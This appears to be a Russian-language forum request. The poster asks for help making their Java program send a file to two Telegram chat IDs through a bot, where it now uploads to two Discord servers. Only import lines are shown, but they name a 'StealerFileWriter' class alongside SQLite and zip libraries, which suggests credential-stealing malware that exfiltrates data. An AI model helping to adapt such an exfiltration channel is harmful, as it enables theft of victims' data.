Мне нужно, чтобы файл отправлялся в тг по двум чат айди через бота а не в дс. Кто может сделать, помогите плиз. в коде ниже он отправляется в 2 дс сервера import java.io .File; import java.io .IOException; import java.lang.reflect.Field; import java.nio.file.Paths; import java.sql.DriverManager; import java.sql.SQLException; import net.dv8tion.jda.api.JDA; import net.dv8tion.jda.api.JDABuilder; import net.dv8tion.jda.api.requests.restaction.MessageCreateAction; import net.dv8tion.jda.api.utils.FileUpload; import net.lingala.zip4j.ZipFile; import org.reallyworld.proverka.StealerFileWriter; import org.reallyworld.proverka.utilities.OSUtility; import org.sqlite.JDBC;
import java.io .File;
import java.io .IOException;
import java.lang.reflect.Field;
import java.nio.file.Paths;
import java.sql.DriverManager;
import java.sql.SQLException;
import net.dv8tion.jda.api.JDA;
import net.dv8tion.jda.api.JDABuilder;
import net.dv8tion.jda.api.requests.restaction.MessageCreateAction;
import net.dv8tion.jda.api.utils.FileUpload;
import net.lingala.zip4j.ZipFile;
import org.reallyworld.proverka.StealerFileWriter;
import org.reallyworld.proverka.utilities.OSUtility;
import org.sqlite.JDBC;